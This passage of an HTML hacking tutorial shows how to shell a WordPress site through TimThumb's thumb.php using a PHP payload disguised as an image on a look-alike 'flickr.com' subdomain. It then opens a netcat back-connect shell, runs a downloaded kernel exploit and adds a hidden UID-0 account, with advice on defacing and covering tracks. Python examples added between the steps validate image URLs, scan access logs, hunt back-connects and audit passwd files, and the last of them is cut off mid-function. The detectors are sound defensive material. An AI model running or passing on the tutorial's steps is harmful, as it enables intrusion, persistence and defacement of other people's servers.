<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Entered!</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Valid Files!<br />[...]<br />File: ‘finalImage.php’ has been successfully created at the Current Directory…</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<strong><span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Upload Output to a Server:</span></strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Next, upload your ‘image.php;.png’ at a free server. <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(000webhost, 0fees etc….)</em></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Go to the vulnerable page and type this at the URL:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.site.com/blog/wp-content/themes/theme_name/thumb.php" rel="nofollow" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.site.com/blog/wp-content/themes/theme_name/thumb.php</a><strong>?src=http://<span style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">flickr.com.</span>domain.0fees.net/image.php;.png</strong></em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">It would be better to create a subdomain named like “flickr.com” <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(or another big image-hosting service)</em>, because sometimes the script doesn’t accept images from other websites.</span></div>
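<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">A check that does not fall for the look-alike host name, as an added example (not code from the original post, nor TimThumb’s own code): the weak functions below mirror the two behaviours the trick above relies on (an allowed host name only has to appear somewhere in the URL, and a file name only has to end in an image extension), while the strict versions parse the URL and compare the real host and the basename. The allowlist entries and the example URLs are constructed for this demonstration.</span></div>

```python
from urllib.parse import urlsplit
import posixpath

# Constructed allowlist of external image hosts (an assumption for this example).
ALLOWED_IMAGE_HOSTS = {"flickr.com", "img.example.org"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}


def weak_host_check(src):
    """Substring match: accepts the URL if an allowed host name appears anywhere in it.

    This is the kind of check that a host named 'flickr.com.<other-domain>' slips past.
    """
    lowered = src.lower()
    return any(allowed in lowered for allowed in ALLOWED_IMAGE_HOSTS)


def strict_host_check(src):
    """Parse the URL and compare the real host name against the allowlist.

    Accepts only the allowed host itself or a dot-bounded subdomain of it, and
    only http/https, so 'user@host' tricks and other schemes are rejected too.
    """
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return any(host == allowed or host.endswith("." + allowed)
               for allowed in ALLOWED_IMAGE_HOSTS)


def weak_extension_check(path):
    """Looks only at how the name ends, so 'image.php;.png' passes."""
    return path.lower().endswith(tuple(IMAGE_EXTS))


def strict_extension_check(path):
    """Require one image extension and a plain basename (letters, digits, '-' and '_').

    A name such as 'image.php;.png' keeps '.php;' in the stem and is rejected.
    """
    stem, ext = posixpath.splitext(posixpath.basename(path))
    if ext.lower() not in IMAGE_EXTS:
        return False
    return bool(stem) and all(c.isalnum() or c in "-_" for c in stem)


def validate_remote_image(src):
    """Return (accepted, reason) for a remote image reference such as a thumb.php 'src' value."""
    if not strict_host_check(src):
        return False, "host not on allowlist"
    if not strict_extension_check(urlsplit(src).path):
        return False, "file name is not a plain image name"
    return True, "ok"


if __name__ == "__main__":
    for url in ("https://flickr.com/photo.png",
                "http://flickr.com.domain.0fees.net/image.php;.png"):
        print(url, "weak:", weak_host_check(url), "strict:", validate_remote_image(url))
```

<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Even with both strict checks, the fetched bytes must never be written under a name taken from the URL into a directory from which the web server executes scripts: the post’s ‘finalImage.php’ is a real image with PHP appended, so a magic-byte check alone would accept it. Decode and re-encode the image and store it under a server-generated name.</span></div>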
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>Website…. Shelled!</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><img alt="" class=" " src="http://d1.dipads.net/i/00025/rq9k3vq8go5k.png" style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" title="GnYShell" /></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">OK. Your website is shelled. This means that you should now have your shell uploaded and be ready to root the server.<br />You could easily deface the website now, but it would be better to root the server first, so as to cover your tracks quickly.</span></div>
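<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">How the request above shows up in the server’s access log, and a small detector for it, as an added example written for this page (not the original post’s code): the log lines are constructed, and the site’s host names and the imitated image host are assumptions for the example. The rule flags any thumb.php request whose src points at a host other than the site itself, and notes when that host merely contains a well-known image host’s name.</span></div>

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-format access-log lines (example data, not real traffic).
SAMPLE_LOG = """\
203.0.113.9 - - [04/Sep/2013:23:01:12 -0700] "GET /blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png HTTP/1.1" 200 1488 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Sep/2013:23:01:40 -0700] "GET /blog/wp-content/themes/theme_name/thumb.php?src=wp-content/uploads/2013/09/header.jpg&w=200 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Sep/2013:23:01:41 -0700] "GET /blog/wp-content/themes/theme_name/thumb.php?src=http://www.site.com/wp-content/uploads/2013/09/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Sep/2013:23:02:05 -0700] "GET /blog/wp-content/themes/theme_name/thumb.php?src=http%3A%2F%2Fflickr.com.domain.0fees.net%2Fimage.php%3B.png HTTP/1.1" 200 1488 "-" "curl/7.26.0"
192.0.2.77 - - [04/Sep/2013:23:03:00 -0700] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumptions for the example: the site's own host names and the
# image hosts an attacker might imitate with a look-alike domain.
SITE_HOSTS = {"www.site.com", "site.com"}
KNOWN_IMAGE_HOSTS = {"flickr.com"}
THUMB_SCRIPTS = ("thumb.php", "timthumb.php")


def query_params(query):
    """Split a query string on '&' only (parse_qs also split on ';' in older Pythons)."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def lookalike_of(host):
    """Return the imitated host if 'host' merely contains a known image host's name."""
    for known in KNOWN_IMAGE_HOSTS:
        if host != known and not host.endswith("." + known) and known in host:
            return known
    return None


def find_remote_src_requests(log_text, site_hosts=SITE_HOSTS):
    """Flag thumb.php requests whose 'src' points at a host other than the site itself."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.lower().endswith(THUMB_SCRIPTS):
            continue
        for src in query_params(target.query).get("src", []):
            src_parts = urlsplit(src)
            host = (src_parts.hostname or "").lower()
            if src_parts.scheme in ("http", "https") and host and host not in site_hosts:
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "src": src,
                    "src_host": host,
                    "lookalike_of": lookalike_of(host),
                })
    return hits


if __name__ == "__main__":
    for hit in find_remote_src_requests(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], "->", hit["src_host"], "(imitates %s)" % hit["lookalike_of"])
```

<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">The percent-encoded variant on the fourth line decodes to the same URL as the first, so the detector normalises the parameter before looking at the host; a status of 200 on such a request is the signal worth paging on, since it means the script fetched the remote file.</span></div>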
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">3. Root the Server:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Now that you have shelled your website, we can start the process of rooting the server.</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">What is rooting when it comes to server hacking?<br />—> Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don’t understand this yet, I reassure you that by the end of the section “Rooting a server” you will have understood exactly what it is…</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong><span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Let’s proceed to rooting….</span></strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Connect via netcat:</span><br />1. Open a port on your router. For this tutorial I will be using 402. (Search Google for how to port forward. It is easier than it seems….)<br />2. Open a terminal.<br />3. Type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">netcat</em></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">4. Now type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">-l -n -v -p 402</em></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">5. It should have an output like this:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">listening on [any] 402 port</em></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">6. Now, go to the Back-Connection function at the Shell.<br />7. Complete with the following:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Host: <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">YourIPAddress</em> Port: <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">402 (or the port you forwarded….)</em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">8. Hit connect and… Voila! Connected to the server!</span></div>
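<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">What the back-connect looks like from the server side, and a hunt rule for it, as an added example (not from the original post): the ss -tnp and ps output below are constructed, and the web-server users, served ports and expected outbound ports are assumptions for the example. The rule flags outbound connections owned by the web user to unexpected ports, and flags interpreter or shell processes holding a socket even when the remote port is an expected one.</span></div>

```python
import re

# Constructed `ss -tnp` output from a hypothetical web server (example data, not from the post).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB  0      0      10.0.0.5:80         198.51.100.4:51234 users:(("apache2",pid=1832,fd=12))
ESTAB  0      0      10.0.0.5:49822      203.0.113.9:402    users:(("sh",pid=2201,fd=3))
ESTAB  0      0      10.0.0.5:38110      10.0.0.9:3306      users:(("apache2",pid=1833,fd=15))
ESTAB  0      0      10.0.0.5:22         192.0.2.10:60022   users:(("sshd",pid=900,fd=4))
ESTAB  0      0      10.0.0.5:41002      203.0.113.9:443    users:(("perl",pid=2310,fd=3))
"""

# Constructed `ps -eo pid,user,comm` output for the same processes.
SAMPLE_PS = """\
  PID USER     COMMAND
 1832 www-data apache2
 1833 www-data apache2
 2201 www-data sh
  900 root     sshd
 2310 www-data perl
"""

# Assumptions for the example: which users serve web content, which ports this host
# serves (so connections on them are inbound), and which outbound ports are expected.
WEB_USERS = {"www-data", "apache", "nobody"}
SERVED_PORTS = {22, 80, 443}
EXPECTED_OUTBOUND_PORTS = {25, 53, 80, 443, 3306}
INTERPRETERS = {"sh", "bash", "dash", "perl", "python", "python3", "nc", "netcat", "socat"}

SS_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+)\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_ps(ps_text):
    """Map pid -> user from `ps -eo pid,user,comm` output (header line is skipped)."""
    users = {}
    for line in ps_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].isdigit():
            users[int(parts[0])] = parts[1]
    return users


def find_suspicious_connections(ss_text, ps_text):
    """Return outbound connections that look like a back-connect from the web tier."""
    users = parse_ps(ps_text)
    hits = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if not m or m.group("state") != "ESTAB":
            continue
        lport, rport, pid = int(m.group("lport")), int(m.group("rport")), int(m.group("pid"))
        if lport in SERVED_PORTS:
            continue  # inbound client connection to a service this host runs
        proc, user = m.group("proc"), users.get(pid, "?")
        reasons = []
        if user in WEB_USERS and rport not in EXPECTED_OUTBOUND_PORTS:
            reasons.append("web user connecting out to an unexpected port")
        if proc in INTERPRETERS:
            reasons.append("interpreter/shell process owns the socket")
        if reasons:
            hits.append({"pid": pid, "user": user, "proc": proc,
                         "peer": "%s:%d" % (m.group("raddr"), rport), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_connections(SAMPLE_SS, SAMPLE_PS):
        print("pid %(pid)d %(user)s %(proc)s -> %(peer)s: %(reasons)s" % hit)
```

<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">In the sample the sh process talking to port 402 trips both rules, and the perl process on port 443 trips only the interpreter rule; the apache2 worker talking to the database on 3306 is left alone. On a real host the same two lists can be fed from a cron job running ss and ps, and an egress firewall rule for the web user is the matching mitigation.</span></div>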
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Downloading and Executing the Kernel exploit:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">1. Now, if you type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">whoami</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">you will see that you are <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">not</span> root yet…<br />2. To become root we have to download a kernel exploit matching the kernel version shown in your shell. <strong>Find kernel exploits <a href="http://localroot.th3-0utl4ws.com/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Linux and Mac Kernel Exploits">here….</a></strong><br />3. Download it to your HDD and then upload it to the server via the shell. <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Unzip it first, if it is zipped….</em><br />4. Now do the following exploit preparations:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– The most common types of exploits:<br />+++ Perl (.pl extension)<br />+++ C (.c extension)</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(( If the exploit is written in C you first have to compile it by typing: <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">gcc exploit.c -o exploit</span> ))</em></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Change the permissions of the exploit:<br /><em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">chmod 777 exploit</span></em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">5. Execute the exploit. Type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">./exploit</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">6. Root permissions acquired! Type this to ensure:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">id</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">or</strong></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">whoami</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">7. Add a new root user:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1<br /><em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">where root1 is your desired username</em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">8. Change the password of the new root user:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">passwd root1</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>SUCCESSFULLY ROOTED!</strong></span></div>
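<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Seen from the administrator's side, the procedure above leaves a very recognisable artefact: step 7 creates a second account that shares UID 0 with root. The following script is an added example (not part of the tutorial, and not the tutorial author's code) that parses passwd-format text and flags any UID-0 account that is not on an allow-list, as well as any UID shared by several accounts. The file name passwd_audit.py, the allow-list and the sample passwd entries are constructed for this example.</span></div>

```python
"""Audit an /etc/passwd file for root-equivalent (UID 0) accounts.

Added example for this page, not the tutorial's own code. An account created
with "adduser -u 0 -o" shares UID 0 with root and is a classic persistence
artefact; this script parses passwd-format text and reports it.
Usage on a real host (file name is hypothetical): python3 passwd_audit.py /etc/passwd
"""
import sys
from collections import defaultdict
from typing import Dict, List

# Constructed sample data (not from a real host): a normal passwd file plus
# the kind of entry that step 7 above leaves behind.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
root1:x:0:0::/home/root1:/bin/bash
"""


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd-format text into dicts; reject lines without 7 fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def find_rogue_root_accounts(text: str, allowed=("root",)) -> List[str]:
    """Names of UID-0 accounts that are not on the allow-list (assumed: only root)."""
    return [e["name"] for e in parse_passwd(text)
            if e["uid"] == 0 and e["name"] not in allowed]


def find_shared_uids(text: str) -> Dict[int, List[str]]:
    """Map each UID that is used by more than one account to those account names."""
    by_uid = defaultdict(list)
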